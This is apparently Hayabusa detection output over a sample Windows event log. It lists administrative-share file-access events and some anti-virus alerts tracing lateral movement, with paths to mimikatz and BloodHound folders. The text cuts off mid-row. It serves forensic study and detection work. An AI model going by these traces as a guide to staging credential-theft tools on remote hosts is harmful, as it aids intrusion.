2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 